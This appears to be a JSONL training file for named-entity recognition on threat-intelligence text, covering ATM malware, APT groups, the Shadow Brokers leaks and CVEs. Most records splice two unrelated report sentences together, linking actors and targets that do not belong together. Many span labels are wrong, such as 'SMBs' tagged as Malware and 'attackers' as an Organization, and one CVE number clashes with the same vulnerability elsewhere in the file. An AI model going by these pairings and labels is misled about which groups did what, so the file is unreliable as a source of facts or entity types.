{"text": "Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits \u2013 4 digits) and the number of cycles (billCount \u2013 2 digits) to repeat the dispensing operation (see Figure 10) . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 26, "end": 35, "label": "Organization"}, {"start": 246, "end": 251, "label": "Organization"}]}
{"text": "Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . Our research indicates that it has started targeting Japanese users .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 231, "end": 245, "label": "Organization"}]}
{"text": "Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": [{"start": 6, "end": 15, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 139, "end": 150, "label": "Organization"}, {"start": 231, "end": 235, "label": "Malware"}, {"start": 273, "end": 284, "label": "Organization"}]}
{"text": "Finally , Mandiant\u2019s Devon Kerr and John Miller of FireEye iSIGHT Intelligence will expose the tactics of FIN7 , a financially motivated hacker group that FireEye tracked throughout 2016 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": [{"start": 10, "end": 20, "label": "Organization"}, {"start": 51, "end": 58, "label": "Organization"}, {"start": 106, "end": 110, "label": "Organization"}, {"start": 115, "end": 126, "label": "Organization"}, {"start": 155, "end": 162, "label": "Organization"}, {"start": 189, "end": 202, "label": "Organization"}, {"start": 368, "end": 378, "label": "Organization"}, {"start": 412, "end": 430, "label": "Organization"}]}
{"text": "In mid-November , Mandiant , a FireEye company , responded to the first Shamoon 2.0 incident against an organization located in the Gulf states . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": [{"start": 18, "end": 26, "label": "Organization"}, {"start": 31, "end": 38, "label": "Organization"}, {"start": 158, "end": 165, "label": "Vulnerability"}, {"start": 239, "end": 244, "label": "System"}, {"start": 289, "end": 294, "label": "System"}]}
{"text": "These attackers can potentially grab sensitive online banking information and other personal data , and even provided support for multifactor authentication and OTP . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": [{"start": 6, "end": 15, "label": "Organization"}, {"start": 54, "end": 61, "label": "Organization"}, {"start": 253, "end": 271, "label": "Organization"}, {"start": 276, "end": 287, "label": "Organization"}]}
{"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 164, "end": 170, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}]}
{"text": "Our visibility into APT28\u2019s operations , which date to at least 2007 , has allowed us to understand the group\u2019s malware , operational changes and motivations . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 224, "end": 243, "label": "Organization"}, {"start": 246, "end": 263, "label": "Organization"}, {"start": 278, "end": 286, "label": "Organization"}, {"start": 319, "end": 340, "label": "Organization"}]}
{"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat and strengthening our confidence in attributing APT28 to the Russian government . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": [{"start": 147, "end": 152, "label": "Organization"}, {"start": 160, "end": 178, "label": "Organization"}, {"start": 213, "end": 223, "label": "Malware"}, {"start": 250, "end": 262, "label": "Malware"}, {"start": 296, "end": 304, "label": "Organization"}]}
{"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 134, "end": 146, "label": "Malware"}, {"start": 262, "end": 281, "label": "Organization"}, {"start": 290, "end": 311, "label": "Organization"}]}
{"text": "The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": [{"start": 4, "end": 16, "label": "Malware"}, {"start": 121, "end": 129, "label": "Malware"}, {"start": 147, "end": 165, "label": "Organization"}, {"start": 249, "end": 260, "label": "Organization"}, {"start": 263, "end": 269, "label": "Organization"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 285, "end": 292, "label": "Malware"}, {"start": 333, "end": 340, "label": "Malware"}, {"start": 341, "end": 348, "label": "Malware"}]}
{"text": "We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": [{"start": 70, "end": 82, "label": "Malware"}, {"start": 145, "end": 153, "label": "Malware"}, {"start": 223, "end": 244, "label": "Organization"}, {"start": 247, "end": 255, "label": "Organization"}, {"start": 258, "end": 275, "label": "Organization"}, {"start": 278, "end": 296, "label": "Organization"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}, {"start": 327, "end": 350, "label": "Organization"}]}
{"text": "There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet . The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": [{"start": 86, "end": 97, "label": "Malware"}, {"start": 116, "end": 129, "label": "Malware"}, {"start": 130, "end": 136, "label": "Malware"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 168, "end": 185, "label": "Organization"}, {"start": 188, "end": 206, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 224, "end": 239, "label": "Organization"}, {"start": 242, "end": 253, "label": "Organization"}]}
{"text": "Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 101, "end": 110, "label": "Malware"}, {"start": 164, "end": 170, "label": "Malware"}, {"start": 216, "end": 222, "label": "Malware"}, {"start": 296, "end": 313, "label": "Organization"}]}
{"text": "Therefore , the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet , as many suspect . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": [{"start": 16, "end": 27, "label": "System"}, {"start": 138, "end": 141, "label": "Organization"}, {"start": 171, "end": 178, "label": "System"}, {"start": 270, "end": 278, "label": "Organization"}]}
{"text": "Of course , it 's also possible that whatever group The Shadow Brokers have exposed simply gained access to the Stuxnet tools secondhand , and reused them . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": [{"start": 112, "end": 125, "label": "System"}, {"start": 317, "end": 326, "label": "Organization"}]}
{"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": [{"start": 48, "end": 51, "label": "Organization"}, {"start": 112, "end": 151, "label": "Malware"}, {"start": 168, "end": 200, "label": "Malware"}, {"start": 272, "end": 285, "label": "Organization"}, {"start": 290, "end": 316, "label": "Organization"}, {"start": 446, "end": 454, "label": "Organization"}]}
{"text": "Some hackers even went onto use the Cisco exploits in the wild . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": [{"start": 36, "end": 50, "label": "Vulnerability"}, {"start": 123, "end": 131, "label": "Organization"}]}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 126, "end": 130, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 246, "end": 266, "label": "Organization"}, {"start": 270, "end": 281, "label": "Organization"}, {"start": 316, "end": 326, "label": "System"}]}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 211, "end": 229, "label": "Organization"}, {"start": 307, "end": 322, "label": "Organization"}]}
{"text": "DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 81, "end": 89, "label": "System"}, {"start": 98, "end": 111, "label": "Malware"}, {"start": 295, "end": 312, "label": "Organization"}, {"start": 357, "end": 382, "label": "Organization"}]}
{"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 81, "end": 90, "label": "System"}, {"start": 196, "end": 211, "label": "System"}, {"start": 216, "end": 230, "label": "System"}, {"start": 235, "end": 245, "label": "System"}, {"start": 252, "end": 278, "label": "Malware"}, {"start": 314, "end": 334, "label": "Organization"}, {"start": 353, "end": 366, "label": "Organization"}]}
{"text": "PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 27, "end": 39, "label": "System"}, {"start": 61, "end": 79, "label": "Malware"}, {"start": 84, "end": 112, "label": "Malware"}, {"start": 124, "end": 130, "label": "Organization"}, {"start": 201, "end": 214, "label": "Organization"}]}
{"text": "The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 4, "end": 13, "label": "System"}, {"start": 18, "end": 30, "label": "System"}, {"start": 171, "end": 184, "label": "Organization"}, {"start": 266, "end": 269, "label": "Indicator"}]}
{"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": [{"start": 79, "end": 96, "label": "System"}, {"start": 117, "end": 147, "label": "Malware"}, {"start": 172, "end": 184, "label": "System"}, {"start": 213, "end": 246, "label": "Malware"}]}
{"text": "The leaked NSA documents and tools published in recent months by the mysterious Shadow Brokers group have provided rare insight into the clandestine digital espionage operations pursued by the spy agency over the past few years , including information on operations aimed at Iran and Russia . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": [{"start": 11, "end": 14, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 343, "end": 360, "label": "Organization"}, {"start": 365, "end": 381, "label": "Organization"}]}
{"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 68, "end": 71, "label": "Organization"}, {"start": 300, "end": 316, "label": "Indicator"}, {"start": 336, "end": 374, "label": "Organization"}, {"start": 377, "end": 381, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 418, "end": 431, "label": "Organization"}]}
{"text": "The ShadowBrokers' latest dump of Equation Group hacks focuses on UNIX systems and GSM networks , and was accompanied by an open letter to President Trump . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": [{"start": 157, "end": 164, "label": "Organization"}, {"start": 241, "end": 257, "label": "Organization"}]}
{"text": "Numerous Windows hacking tools are also among the new batch of files the Shadow Brokers dumped Friday . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": [{"start": 9, "end": 30, "label": "System"}, {"start": 104, "end": 115, "label": "Malware"}, {"start": 140, "end": 149, "label": "Organization"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 166, "end": 189, "label": "Organization"}]}
{"text": "The leaked files show the NSA was allegedly targeting EastNets in Dubai , Belgium , and Egypt . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": [{"start": 26, "end": 29, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 218, "end": 241, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 260, "end": 280, "label": "Organization"}, {"start": 302, "end": 322, "label": "Organization"}, {"start": 327, "end": 336, "label": "Organization"}]}
{"text": "The files appear to include logs from 2013 that show the NSA was also targeting oil and investment companies across the Middle East . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": [{"start": 57, "end": 60, "label": "Organization"}, {"start": 80, "end": 83, "label": "Organization"}, {"start": 88, "end": 108, "label": "Organization"}, {"start": 246, "end": 273, "label": "Organization"}]}
{"text": "According to Kaspersky , the Equation Group has more than 60 members and has been operating since at least 2001 . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 143, "end": 149, "label": "System"}, {"start": 168, "end": 182, "label": "Organization"}]}
{"text": "The existence of the Equation Group was first posited in Feb. 2015 by researchers at Russian security firm Kaspersky Lab , which described it as one of the most sophisticated cyber attack teams in the world . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": [{"start": 93, "end": 106, "label": "Organization"}, {"start": 107, "end": 120, "label": "Organization"}, {"start": 299, "end": 343, "label": "Organization"}, {"start": 348, "end": 352, "label": "Organization"}]}
{"text": "Most of the Equation Group 's targets have been in Iran , Russia , Pakistan , Afghanistan , India , Syria , and Mali . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": [{"start": 12, "end": 26, "label": "Organization"}, {"start": 143, "end": 149, "label": "System"}, {"start": 163, "end": 177, "label": "Organization"}]}
{"text": "According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": [{"start": 238, "end": 245, "label": "Organization"}, {"start": 299, "end": 305, "label": "System"}, {"start": 333, "end": 347, "label": "Organization"}]}
{"text": "KrebsOnSecurity was first made aware of the metadata in the Shadow Brokers leak by Mike Poor , Rob Curtinseufert , and Larry Pesce . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 60, "end": 74, "label": "Organization"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 329, "end": 347, "label": "Organization"}]}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 351, "end": 355, "label": "System"}, {"start": 422, "end": 450, "label": "Organization"}, {"start": 459, "end": 484, "label": "Organization"}]}
{"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency \u2013 NSA 's hacking tools and tactics . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 117, "end": 120, "label": "Organization"}, {"start": 219, "end": 227, "label": "Organization"}]}
{"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": [{"start": 3, "end": 23, "label": "Malware"}, {"start": 121, "end": 146, "label": "Malware"}, {"start": 151, "end": 173, "label": "Malware"}, {"start": 305, "end": 318, "label": "Organization"}, {"start": 323, "end": 331, "label": "Organization"}]}
{"text": "UNITEDRAKE is described as a \" fully extensible \" data collection tool that is specifically developed for Windows machines to allow operators the chance of controlling a device completely . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 276, "end": 285, "label": "Organization"}, {"start": 295, "end": 313, "label": "Organization"}]}
{"text": "On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user .", "spans": [{"start": 133, "end": 136, "label": "Organization"}, {"start": 161, "end": 172, "label": "Vulnerability"}, {"start": 301, "end": 313, "label": "Organization"}, {"start": 333, "end": 343, "label": "Organization"}, {"start": 380, "end": 392, "label": "Organization"}]}
{"text": "This turned out to be a malicious loader internally named ' Slingshot ' , part of a new , and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": [{"start": 60, "end": 69, "label": "System"}, {"start": 143, "end": 157, "label": "System"}, {"start": 162, "end": 167, "label": "System"}, {"start": 301, "end": 322, "label": "Organization"}]}
{"text": "One of them \u2013 ipv4.dll \u2013 has been placed by the APT with what is , in fact , a downloader for other malicious components . In the latest attack , Donot group is targeting Pakistani businessman working in China", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 79, "end": 89, "label": "System"}, {"start": 146, "end": 157, "label": "Organization"}, {"start": 171, "end": 192, "label": "Organization"}]}
{"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown .", "spans": [{"start": 123, "end": 132, "label": "System"}, {"start": 312, "end": 319, "label": "Organization"}, {"start": 332, "end": 352, "label": "Organization"}]}
{"text": "During our research we also found a component called KPWS that turned out to be another downloader for Slingshot components . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": [{"start": 53, "end": 57, "label": "System"}, {"start": 103, "end": 112, "label": "System"}, {"start": 154, "end": 166, "label": "Organization"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 183, "end": 202, "label": "Organization"}, {"start": 205, "end": 214, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 292, "end": 302, "label": "Organization"}, {"start": 307, "end": 314, "label": "Organization"}]}
{"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": [{"start": 29, "end": 44, "label": "Malware"}, {"start": 45, "end": 65, "label": "Malware"}, {"start": 148, "end": 177, "label": "Malware"}, {"start": 347, "end": 368, "label": "Organization"}, {"start": 379, "end": 388, "label": "Organization"}, {"start": 393, "end": 412, "label": "Organization"}]}
{"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": [{"start": 44, "end": 76, "label": "Malware"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 297, "end": 308, "label": "Organization"}]}
{"text": "So far , researchers have seen around 100 victims of Slingshot and its related modules , located in Kenya , Yemen , Afghanistan , Libya , Congo , Jordan , Turkey , Iraq , Sudan , Somalia and Tanzania . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel .", "spans": [{"start": 53, "end": 62, "label": "System"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 259, "end": 269, "label": "Organization"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 287, "end": 299, "label": "Organization"}]}
{"text": "Some of the techniques used by Slingshot , such as the exploitation of legitimate , yet vulnerable drivers has been seen before in other malware , such as White and Grey Lambert . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": [{"start": 31, "end": 40, "label": "System"}, {"start": 155, "end": 160, "label": "System"}, {"start": 165, "end": 177, "label": "System"}, {"start": 220, "end": 226, "label": "Malware"}, {"start": 251, "end": 254, "label": "Organization"}, {"start": 258, "end": 266, "label": "Organization"}, {"start": 269, "end": 275, "label": "Organization"}]}
{"text": "Cylance tracks this threat group internally as ' Snake Wine ' . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 49, "end": 59, "label": "Organization"}, {"start": 75, "end": 82, "label": "Organization"}, {"start": 83, "end": 89, "label": "System"}, {"start": 136, "end": 153, "label": "Indicator"}, {"start": 218, "end": 223, "label": "Organization"}]}
{"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": [{"start": 23, "end": 33, "label": "Organization"}, {"start": 123, "end": 131, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 186, "end": 190, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 236, "end": 242, "label": "System"}]}
{"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 118, "end": 145, "label": "Malware"}, {"start": 224, "end": 235, "label": "Organization"}, {"start": 388, "end": 407, "label": "Organization"}, {"start": 410, "end": 419, "label": "Organization"}, {"start": 426, "end": 436, "label": "Organization"}]}
{"text": "Based upon Cylance 's observations , the Tofu Backdoor was deployed in far fewer instances than the Ham Backdoor . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 41, "end": 54, "label": "System"}, {"start": 100, "end": 112, "label": "System"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 143, "end": 149, "label": "System"}, {"start": 175, "end": 184, "label": "Indicator"}, {"start": 188, "end": 227, "label": "Organization"}]}
{"text": "This suggests that the Snake Wine group will likely continue to escalate their activity and persistently target both private and government entities within Japan . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 129, "end": 148, "label": "Organization"}, {"start": 190, "end": 206, "label": "Indicator"}, {"start": 226, "end": 264, "label": "Organization"}, {"start": 267, "end": 271, "label": "Organization"}, {"start": 293, "end": 303, "label": "Organization"}, {"start": 308, "end": 321, "label": "Organization"}]}
{"text": "The group was first publicly disclosed by FireEye in this report . The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection .", "spans": [{"start": 42, "end": 49, "label": "Organization"}, {"start": 90, "end": 103, "label": "Vulnerability"}]}
{"text": "MenuPass is a well-documented CN-APT group , whose roots go back to 2009 . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 75, "end": 90, "label": "Organization"}, {"start": 103, "end": 116, "label": "Organization"}, {"start": 238, "end": 246, "label": "Vulnerability"}, {"start": 247, "end": 254, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}]}
{"text": "Snake Wine was first publicly disclosed by FireEye in this report . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document .", "spans": [{"start": 43, "end": 50, "label": "Organization"}, {"start": 107, "end": 113, "label": "System"}, {"start": 171, "end": 184, "label": "System"}, {"start": 185, "end": 192, "label": "Vulnerability"}]}
{"text": "Although the MenuPass Group used mostly publicly available RATs , they were successful in penetrating a number of high value targets , so it is entirely possible this is indeed a continuation of past activity . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated .", "spans": [{"start": 40, "end": 63, "label": "System"}]}
{"text": "Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28 . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": [{"start": 45, "end": 67, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 233, "end": 246, "label": "Vulnerability"}, {"start": 262, "end": 265, "label": "System"}]}
{"text": "Germany 's Der Spiegel re-published the slide set with far less deletions recently , in January 2015 , and therefore gave a deeper insight about what CSEC actually says they have tracked down . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": [{"start": 11, "end": 22, "label": "Organization"}, {"start": 238, "end": 241, "label": "System"}, {"start": 273, "end": 282, "label": "Organization"}, {"start": 283, "end": 290, "label": "System"}, {"start": 318, "end": 331, "label": "Vulnerability"}]}
{"text": "According to slide 22 , \" CSEC assesses , with moderate certainty , SNOWGLOBE to be a state-sponsored Cyber Network Operation effort , put forth by a French intelligence agency \" . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": [{"start": 210, "end": 229, "label": "Indicator"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 280, "end": 289, "label": "Malware"}, {"start": 290, "end": 297, "label": "Malware"}]}
{"text": "The information given dates back to 2011 and nothing else has been published since . FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 .", "spans": [{"start": 85, "end": 92, "label": "Organization"}, {"start": 111, "end": 117, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 141, "end": 152, "label": "Organization"}, {"start": 196, "end": 204, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 225, "end": 230, "label": "Organization"}, {"start": 256, "end": 264, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 326, "end": 334, "label": "Vulnerability"}, {"start": 335, "end": 348, "label": "Vulnerability"}]}
